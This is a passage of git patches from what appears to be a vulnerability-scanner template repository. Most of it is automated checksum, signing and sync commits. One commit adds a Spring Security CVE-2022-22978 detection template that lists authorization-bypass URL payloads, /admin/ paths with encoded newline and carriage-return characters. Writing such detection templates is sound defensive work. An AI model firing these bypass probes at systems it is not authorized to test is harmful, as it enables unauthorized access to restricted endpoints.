-http/cves/2023/CVE-2023-47117.yaml -http/cves/2023/CVE-2023-52251.yaml -http/cves/2024/CVE-2024-25852.yaml -http/cves/2024/CVE-2024-27292.yaml -http/cves/2024/CVE-2024-29972.yaml -http/cves/2024/CVE-2024-32709.yaml -http/cves/2024/CVE-2024-33113.yaml -http/cves/2024/CVE-2024-33605.yaml -http/cves/2024/CVE-2024-33610.yaml -http/cves/2024/CVE-2024-34102.yaml -http/cves/2024/CVE-2024-36401.yaml -http/cves/2024/CVE-2024-36991.yaml -http/cves/2024/CVE-2024-37032.yaml -http/cves/2024/CVE-2024-37152.yaml -http/cves/2024/CVE-2024-37881.yaml -http/cves/2024/CVE-2024-4434.yaml -http/cves/2024/CVE-2024-4836.yaml -http/cves/2024/CVE-2024-5084.yaml -http/cves/2024/CVE-2024-5522.yaml -http/cves/2024/CVE-2024-5947.yaml -http/cves/2024/CVE-2024-6028.yaml -http/cves/2024/CVE-2024-6188.yaml -http/default-logins/apache/apache-apollo-default-login.yaml -http/default-logins/caprover/caprover-default-login.yaml -http/default-logins/dialogic/dialogic-xms-default-login.yaml -http/default-logins/jeedom/jeedom-default-login.yaml -http/default-logins/ruijie/ruijie-nbr-default-login.yaml -http/exposed-panels/apache/apache-apollo-panel.yaml -http/exposed-panels/dialogic-xms-console.yaml -http/exposed-panels/endpoint-protector-panel.yaml -http/exposed-panels/label-studio-panel.yaml -http/exposures/backups/sql-server-dump.yaml -http/exposures/configs/apache-pinot-config.yaml -http/exposures/configs/filestash-admin-config.yaml -http/exposures/configs/neo4j-neodash-config.yaml -http/exposures/tokens/jwk-json-leak.yaml -http/misconfiguration/coolify-register-account.yaml -http/misconfiguration/forgejo-repo-exposure.yaml -http/misconfiguration/installer/kodbox-installer.yaml -http/misconfiguration/installer/piwigo-installer.yaml -http/misconfiguration/installer/poste-io-installer.yaml -http/misconfiguration/installer/subrion-installer.yaml -http/misconfiguration/label-studio-signup.yaml -http/misconfiguration/laragon-phpinfo.yaml -http/misconfiguration/seq-dashboard-unath.yaml -http/technologies/apache/apache-cloudstack-detect.yaml -http/technologies/apache/apache-pinot-detect.yaml -http/technologies/neo4j-neodash-detect.yaml -http/technologies/wordpress/plugins/chaty.yaml -http/vulnerabilities/backdoor/polyfill-backdoor.yaml -http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml -http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml -http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml -http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml -http/vulnerabilities/next-js-cache-poisoning.yaml -http/vulnerabilities/other/azon-dominator-sqli.yaml -http/vulnerabilities/other/bagisto-csti.yaml -http/vulnerabilities/other/crocus-lfi.yaml -http/vulnerabilities/other/enjoyrmis-sqli.yaml -http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml -http/vulnerabilities/other/pingsheng-electronic-sqli.yaml -http/vulnerabilities/other/sharp-printers-lfi.yaml -javascript/enumeration/ldap/ldap-metadata.yaml +http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml From c851c8799cc4c8d22a530e8beb57a38f919ad9ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:14:08 +0000 Subject: [PATCH 021/247] Auto Generated Templates Checksum [Wed Jul 10 18:14:08 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index ff788488c7f..8d84c7a7cd7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2,11 +2,11 @@ CODE_OF_CONDUCT.md:5c581b341cecd31ea4a275098ec84be9951f1593 CONTRIBUTING.md:a280fa8badd8622a481e1bb7f492dd82ac05ea71 LICENSE.md:48790f08ca6757688e2f5f3f4b017a073b3e20df PULL_REQUEST_TEMPLATE.md:c8aba78d67442f639483a10fa74681dea94faeb7 -README.md:98bddb6b4dbb0865961b2194f708b03ea1c7a1c2 +README.md:49276d7e139dd9802214cad0b9cb41f6fe6c9da5 README_KR.md:174470dbc5c69e81f83ff816655a52cc8c5d7f26 -TEMPLATES-STATS.json:c6059846080f49ae10a66cecf51cbccc534786f4 -TEMPLATES-STATS.md:78b61fd6c62a52c0153c649fca26c0dff16d3a7e -TOP-10.md:4844aeabdab16b516603f50126c216b7b69c2743 +TEMPLATES-STATS.json:41391c1eb4a099a83a3e69f746af2cea0724e077 +TEMPLATES-STATS.md:951e805f89f9349e5cc0471b1d99331b29a3ca0c +TOP-10.md:5a847073660f6446f71bc9189fd4ea94d68bc20a cloud/aws/acm/acm-cert-expired.yaml:5c2330bf9034cad5cde868b85128ba737f45c37f cloud/aws/acm/acm-cert-renewal-30days.yaml:ad88137bc1382a729e7b3f3a0172aab684af2743 cloud/aws/acm/acm-cert-renewal-45days.yaml:0cb9388dd736046c47748a973e9092c12ada2f79 @@ -7922,6 +7922,7 @@ http/vulnerabilities/netmizer/netmizer-data-listing.yaml:86b5ea2ca47dcb2b20aeff8 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6deeefe602a60f94435d7cab07 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a +http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:b84ccea8bafe2e592ec927fe3fc13348d4881f39 http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8009,7 +8010,7 @@ http/vulnerabilities/other/elFinder-path-traversal.yaml:9c9ea74d1312aada35ec1821 http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:7b2eac74efc5e020858690936c34ea3c3879b3f9 http/vulnerabilities/other/empirecms-xss.yaml:1dd42b3c178c08112a55a795637916ae0ad19302 http/vulnerabilities/other/ems-sqli.yaml:5041a04bd1dddfaa7461e369509b318dda871c4d -http/vulnerabilities/other/enjoyrmis-sqli.yaml:577035f2527555a69ee341462e68485e54748a8d +http/vulnerabilities/other/enjoyrmis-sqli.yaml:10b4c83409aa50fed78065b26ab34a7c8f6aa631 http/vulnerabilities/other/ep-web-cms-xss.yaml:9b9f26659fe3486aeb093bff5874b1f9900df616 http/vulnerabilities/other/epp-server-lfi.yaml:73d70e01fa3888f4152dddbf72025699ec7a7cda http/vulnerabilities/other/erensoft-sqli.yaml:2db8e70b395c704b4ba339d911330f5fd8d5ae23 @@ -8864,7 +8865,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8cdeacbe92a6e6e04f470f6e40d622e2d444e53d +templates-checksum.txt:7890ab792f534422afdc4500b1d80803cce74f0b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 0e8dfa9c6d5cc9bfad33193f3eb55311886a744c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 10 Jul 2024 23:44:21 +0530 Subject: [PATCH 022/247] Update snoop-servlet-exposure.yaml --- http/exposures/configs/snoop-servlet-exposure.yaml | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/http/exposures/configs/snoop-servlet-exposure.yaml b/http/exposures/configs/snoop-servlet-exposure.yaml index 5ff4d3f827d..166a8c3c9bd 100644 --- a/http/exposures/configs/snoop-servlet-exposure.yaml +++ b/http/exposures/configs/snoop-servlet-exposure.yaml @@ -1,20 +1,24 @@ id: snoop-servlet info: - name: Snoop Servlet information disclosure + name: Snoop Servlet - Information Disclosure author: omranisecurity severity: low - description: The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. - reference: https://www.acunetix.com/vulnerabilities/web/snoop-servlet-information-disclosure/ + description: | + The Snoop Servlet returns information about the HTTP request itself and sometimes. It could help an attacker to prepare more advanced attacks. + reference: + - https://www.acunetix.com/vulnerabilities/\web/snoop-servlet-information-disclosure/ metadata: - shodan-query: http.title:"Snoop Servlet" - fofa-query: title=="Snoop Servlet" + max-request: 1 + shodan-query: title:"Snoop Servlet" + fofa-query: title="Snoop Servlet" tags: config,exposure,snoop,snoop-servlet http: - method: GET path: - "{{BaseURL}}/snoop" + matchers: - type: dsl dsl: From 7035d2e6887a6218c0305337f81c15a9da689830 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:14:41 +0000 Subject: [PATCH 023/247] Syncing Templates --- .github/workflows/templates-sync.yml | 76 +--------------------------- 1 file changed, 1 insertion(+), 75 deletions(-) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e8d7b6b2f60..d92152ac8d5 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,81 +3,7 @@ on: push: paths: - '.new-additions' - - 'dast/cves/2022/spring4shell-CVE-2022-22965.yaml' - - 'dast/vulnerabilities/injection/csv-injection.yaml' - - 'dast/vulnerabilities/injection/xinclude-injection.yaml' - - 'http/cnvd/2023/CNVD-2023-03903.yaml' - - 'http/cnvd/2024/CNVD-2021-64035.yaml' - - 'http/cves/2020/CVE-2020-10189.yaml' - - 'http/cves/2023/CVE-2023-3380.yaml' - - 'http/cves/2023/CVE-2023-35156.yaml' - - 'http/cves/2023/CVE-2023-35159.yaml' - - 'http/cves/2023/CVE-2023-35160.yaml' - - 'http/cves/2023/CVE-2023-35161.yaml' - - 'http/cves/2023/CVE-2023-41599.yaml' - - 'http/cves/2023/CVE-2023-47117.yaml' - - 'http/cves/2023/CVE-2023-52251.yaml' - - 'http/cves/2024/CVE-2024-25852.yaml' - - 'http/cves/2024/CVE-2024-27292.yaml' - - 'http/cves/2024/CVE-2024-29972.yaml' - - 'http/cves/2024/CVE-2024-32709.yaml' - - 'http/cves/2024/CVE-2024-33113.yaml' - - 'http/cves/2024/CVE-2024-33605.yaml' - - 'http/cves/2024/CVE-2024-33610.yaml' - - 'http/cves/2024/CVE-2024-34102.yaml' - - 'http/cves/2024/CVE-2024-36401.yaml' - - 'http/cves/2024/CVE-2024-36991.yaml' - - 'http/cves/2024/CVE-2024-37032.yaml' - - 'http/cves/2024/CVE-2024-37152.yaml' - - 'http/cves/2024/CVE-2024-37881.yaml' - - 'http/cves/2024/CVE-2024-4434.yaml' - - 'http/cves/2024/CVE-2024-4836.yaml' - - 'http/cves/2024/CVE-2024-5084.yaml' - - 'http/cves/2024/CVE-2024-5522.yaml' - - 'http/cves/2024/CVE-2024-5947.yaml' - - 'http/cves/2024/CVE-2024-6028.yaml' - - 'http/cves/2024/CVE-2024-6188.yaml' - - 'http/default-logins/apache/apache-apollo-default-login.yaml' - - 'http/default-logins/caprover/caprover-default-login.yaml' - - 'http/default-logins/dialogic/dialogic-xms-default-login.yaml' - - 'http/default-logins/jeedom/jeedom-default-login.yaml' - - 'http/default-logins/ruijie/ruijie-nbr-default-login.yaml' - - 'http/exposed-panels/apache/apache-apollo-panel.yaml' - - 'http/exposed-panels/dialogic-xms-console.yaml' - - 'http/exposed-panels/endpoint-protector-panel.yaml' - - 'http/exposed-panels/label-studio-panel.yaml' - - 'http/exposures/backups/sql-server-dump.yaml' - - 'http/exposures/configs/apache-pinot-config.yaml' - - 'http/exposures/configs/filestash-admin-config.yaml' - - 'http/exposures/configs/neo4j-neodash-config.yaml' - - 'http/exposures/tokens/jwk-json-leak.yaml' - - 'http/misconfiguration/coolify-register-account.yaml' - - 'http/misconfiguration/forgejo-repo-exposure.yaml' - - 'http/misconfiguration/installer/kodbox-installer.yaml' - - 'http/misconfiguration/installer/piwigo-installer.yaml' - - 'http/misconfiguration/installer/poste-io-installer.yaml' - - 'http/misconfiguration/installer/subrion-installer.yaml' - - 'http/misconfiguration/label-studio-signup.yaml' - - 'http/misconfiguration/laragon-phpinfo.yaml' - - 'http/misconfiguration/seq-dashboard-unath.yaml' - - 'http/technologies/apache/apache-cloudstack-detect.yaml' - - 'http/technologies/apache/apache-pinot-detect.yaml' - - 'http/technologies/neo4j-neodash-detect.yaml' - - 'http/technologies/wordpress/plugins/chaty.yaml' - - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - - 'http/vulnerabilities/hjsoft/hjsoft-hcm-lfi.yaml' - - 'http/vulnerabilities/hjsoft/hjsoft-hcm-sqli.yaml' - - 'http/vulnerabilities/hjsoft/hjsoft-hcm-tb-sqli.yaml' - - 'http/vulnerabilities/jinhe/jinhe-oa-c6-upload-lfi.yaml' - - 'http/vulnerabilities/next-js-cache-poisoning.yaml' - - 'http/vulnerabilities/other/azon-dominator-sqli.yaml' - - 'http/vulnerabilities/other/bagisto-csti.yaml' - - 'http/vulnerabilities/other/crocus-lfi.yaml' - - 'http/vulnerabilities/other/enjoyrmis-sqli.yaml' - - 'http/vulnerabilities/other/h3c-cnsss-arbitrary-file-upload.yaml' - - 'http/vulnerabilities/other/pingsheng-electronic-sqli.yaml' - - 'http/vulnerabilities/other/sharp-printers-lfi.yaml' - - 'javascript/enumeration/ldap/ldap-metadata.yaml' + - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 97779cf5d1ec5f8a9c7fc0f159082ae2bc0bc492 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:15:48 +0000 Subject: [PATCH 024/247] Auto Template Signing [Wed Jul 10 18:15:48 UTC 2024] :robot: --- http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml index ee2bd67def3..79d754f8cab 100644 --- a/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml @@ -48,3 +48,4 @@ http: - "status_code_2 == 200 && contains(all_headers_2, 'X-Middleware-Skip: 1')" - "status_code_3 == 200 && contains(all_headers_3, 'X-Middleware-Skip: 1')" condition: and +# digest: 4a0a00473045022100c4ebdaa33a24364b034d2b90a9fd90d56559a299585b5478e6d28b59310630810220549105fd216b645dc17bc0919359884322924cd407a343e67612dce824e73f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c3133ef7687e15656e04839bee4b95a1101edcce Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:25:38 +0000 Subject: [PATCH 025/247] Auto Generated New Template Addition List [Wed Jul 10 18:25:38 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index a2d790ddcce..56a631c95e2 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,3 @@ +http/cves/2023/CVE-2023-4220.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml +http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 694496aa8743837797a39f98f3638af8aed6bdb2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:25:47 +0000 Subject: [PATCH 026/247] Auto Generated Templates Checksum [Wed Jul 10 18:25:46 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8d84c7a7cd7..6fc3835d0b2 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -7922,7 +7922,8 @@ http/vulnerabilities/netmizer/netmizer-data-listing.yaml:86b5ea2ca47dcb2b20aeff8 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6deeefe602a60f94435d7cab07 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a -http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:b84ccea8bafe2e592ec927fe3fc13348d4881f39 +http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:3e9d98f1110135883c32e54d0c35f5b619517967 +http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml:fc3e7112468c332c53a2c56432a16e1e9ea7808c http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8865,7 +8866,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:7890ab792f534422afdc4500b1d80803cce74f0b +templates-checksum.txt:cdb65a878c01ab07c3cb30eb6d7f0da32e92d971 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 292cac91abff46544e7ba2e21dbe6cd93f6bec03 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:25:56 +0000 Subject: [PATCH 027/247] Auto Generated New Template Addition List [Wed Jul 10 18:25:56 UTC 2024] :robot: From 7c872360e0ec80fd13685c07ec95af4814a05eb2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 18:26:32 +0000 Subject: [PATCH 028/247] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d92152ac8d5..b3ea198a56e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,7 +3,9 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-4220.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' + - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From fa919a7fca3628c65d2bdd0aac8b02326f272b8f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 18:27:25 +0000 Subject: [PATCH 029/247] Auto Template Signing [Wed Jul 10 18:27:25 UTC 2024] :robot: --- http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml index 6389b4aca44..6b1efba314b 100644 --- a/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml +++ b/http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml @@ -48,3 +48,4 @@ http: - "status_code_2 == 200 && contains(content_type_2, 'text/x-component')" - "status_code_3 == 200 && contains(content_type_3, 'text/x-component')" condition: and +# digest: 4a0a0047304502204ed973cfb9843fd79d0b341b5bf2d36a17a5dd10270bb3114b2b3846b9a3fa3c022100a64054e6356d0cca61ed26edaa0fb3625aed1e09512172a1497cc2ad551ad467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 5546117a319b4e0fd29f4a62a34590a57f91a745 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 10 Jul 2024 21:06:09 +0000 Subject: [PATCH 030/247] Auto Generated New Template Addition List [Wed Jul 10 21:06:09 UTC 2024] :robot: From 96e02bdc8aff7489cc28c95e9ba95befea837efa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 21:06:13 +0000 Subject: [PATCH 031/247] Auto Generated Templates Checksum [Wed Jul 10 21:06:13 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6fc3835d0b2..6936b1d38ab 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3273,6 +3273,7 @@ http/cves/2023/CVE-2023-4173.yaml:7a186ce21f79cc2aaf602f20096b3da265eea94e http/cves/2023/CVE-2023-4174.yaml:6d9b3231d2c766eb63eedeb04b924000b7999e4e http/cves/2023/CVE-2023-41763.yaml:b428682d889984946edc1203e1c240b9c5ae4137 http/cves/2023/CVE-2023-41892.yaml:1e501e0ef2d2102d6c865fe4547501649ec2164c +http/cves/2023/CVE-2023-4220.yaml:37f85450f2c470ce7c25e52facf939eb511460d2 http/cves/2023/CVE-2023-42343.yaml:69a0589c7e96b3ae72a73dc5610cd79f60246440 http/cves/2023/CVE-2023-42344.yaml:674f69182dcf67d59a4a19c9adfc0b2e92fe5645 http/cves/2023/CVE-2023-42442.yaml:5ea1d0998ecaa52c2608185126326ef0ea979314 @@ -7264,7 +7265,7 @@ http/technologies/vmware/vmware-detect.yaml:4f8fbfc3da99dc2f1d4b5294463c24adbd58 http/technologies/vmware/vmware-horizon-version.yaml:86445c8b1d7b19b717cf68e6135f1801214018af http/technologies/vmware/vmware-site-recovery-manager.yaml:206cc779975a1e77b16422af0454f4b370f18a73 http/technologies/vmware/vmware-vrealize-detect.yaml:b284b80bdd27cc66d9c343300bfc273448c724a6 -http/technologies/waf-detect.yaml:1fca6289adeea30092957bb876f80dab36b8ca8d +http/technologies/waf-detect.yaml:0cce0b5669bc9d6874ee987a9c4daed3f801c13a http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d @@ -7923,7 +7924,7 @@ http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6dee http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml:3e9d98f1110135883c32e54d0c35f5b619517967 -http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml:fc3e7112468c332c53a2c56432a16e1e9ea7808c +http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml:ae6ada4c9bb6b978fb03ed63733b079092b6e9a9 http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8866,7 +8867,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:cdb65a878c01ab07c3cb30eb6d7f0da32e92d971 +templates-checksum.txt:98ad3f9c23c3f08754417333ac80eac604ecda10 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 775e6d0b7d9ec5f13b7e03441fe64516f48d6dba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 10 Jul 2024 21:08:05 +0000 Subject: [PATCH 032/247] Auto Template Signing [Wed Jul 10 21:08:05 UTC 2024] :robot: --- http/cves/2023/CVE-2023-4220.yaml | 1 + http/technologies/waf-detect.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2023/CVE-2023-4220.yaml b/http/cves/2023/CVE-2023-4220.yaml index 4529ba46328..82e8fcd8ab2 100644 --- a/http/cves/2023/CVE-2023-4220.yaml +++ b/http/cves/2023/CVE-2023-4220.yaml @@ -55,3 +55,4 @@ http: - 'contains(body_2,"{{md5(num)}}")' - 'status_code_1 == 200 && status_code_2 == 200' condition: and +# digest: 490a0046304402202ba2802508b1a8106520e47642aee8d4b207bacca790fa88de82191931bd865c022022060f23d393a03776c518d9167dcf9508a0a32d8b2e7ff199d1d8a0c670f3f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 49b870cf3f1..b000df1c56b 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -801,3 +801,4 @@ http: part: header words: - "X-Protected-By: shieldon.io" +# digest: 4a0a00473045022100ff430ca1fdcdc591de91ca07469d95bd84da955a31a67a5f4261ba0918ab93cf02207bd90ded649ea144d20d1c38663a4dd310fe9bc9465e90fdadbf7b922fc1a6c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d4cb08199218747e621100c6dbb05c64f9bc88a4 Mon Sep 17 00:00:00 2001 From: Sumanth Vankineni Date: Wed, 10 Jul 2024 16:33:42 -0700 Subject: [PATCH 033/247] Fixed issues for CVE-2022-22978 --- http/cves/2022/CVE-2022-22978.yaml | 55 ++++++++++++++++++++++++++++ network/cves/2024/CVE-2024-6387.yaml | 38 ------------------- 2 files changed, 55 insertions(+), 38 deletions(-) create mode 100644 http/cves/2022/CVE-2022-22978.yaml delete mode 100644 network/cves/2024/CVE-2024-6387.yaml diff --git a/http/cves/2022/CVE-2022-22978.yaml b/http/cves/2022/CVE-2022-22978.yaml new file mode 100644 index 00000000000..1102f7dc24f --- /dev/null +++ b/http/cves/2022/CVE-2022-22978.yaml @@ -0,0 +1,55 @@ +id: CVE-2022-22978 + +info: + name: Spring Security RegexRequestMatcher Authorization Bypass + author: Sumanth Vankineni + severity: critical + description: | + In Spring Security versions prior to 5.4.11, 5.5.7, 5.6.4, and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass. + impact: | + Successful exploitation of this vulnerability allows an attacker to bypass authorization checks and access restricted endpoints. + remediation: | + Upgrade to Spring Security version 5.4.11, 5.5.7, 5.6.4, or later to mitigate this vulnerability. + reference: + - https://tanzu.vmware.com/security/cve-2022-22978 + - https://github.com/DeEpinGh0st/CVE-2022-22978 + - https://snyk.io/blog/spring-security-authorization-bypass-cve-2022-31692/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22978 + cwe-id: CWE-287 + epss-score: 0.89 + epss-percentile: 0.99 + cpe: cpe:2.3:a:pivotal_software:spring_security:*:*:*:*:*:*:*:* + +http: + - method: GET + path: + - "{{BaseURL}}/admin/%0atest" + - "{{BaseURL}}/admin/%0dtest" + - "{{BaseURL}}/admin/index%0a" + - "{{BaseURL}}/admin/index%0d" + - "{{BaseURL}}/admin/%0aindex" + - "{{BaseURL}}/admin/%0dindex" + - "{{BaseURL}}/admin/%0atest.html" + - "{{BaseURL}}/admin/%0dtest.html" + - "{{BaseURL}}/admin/%0a.jsp" + - "{{BaseURL}}/admin/%0d.jsp" + - "{{BaseURL}}/admin/.%0a" + - "{{BaseURL}}/admin/.%0d" + - "{{BaseURL}}/admin/test/%0a" + - "{{BaseURL}}/admin/test/%0d" + - "{{BaseURL}}/admin/dashboard/%0a" + - "{{BaseURL}}/admin/dashboard/%0d" + - "{{BaseURL}}/admin/config/%0a" + - "{{BaseURL}}/admin/config/%0d" + - "{{BaseURL}}/admin/settings/%0a" + - "{{BaseURL}}/admin/settings/%0d" + - "{{BaseURL}}/admin/secure/%0a" + - "{{BaseURL}}/admin/secure/%0d" + stop-at-first-match: true + matchers: + - type: status + status: + - 200 diff --git a/network/cves/2024/CVE-2024-6387.yaml b/network/cves/2024/CVE-2024-6387.yaml deleted file mode 100644 index 0cbf0d87385..00000000000 --- a/network/cves/2024/CVE-2024-6387.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2024-6387 - -info: - name: regreSSHion - Vulnerable SSH Authentication - author: Sumanth Vankineni - severity: high - description: | - The CVE-2024-6387 describes a vulnerability in the SSH service where malformed authentication requests can lead to unauthorized access. - remediation: Update to the latest version of SSH to mitigate this vulnerability. - reference: - - https://example.com/cve-2024-6387 - - https://nvd.nist.gov/vuln/detail/CVE-2024-6387 - 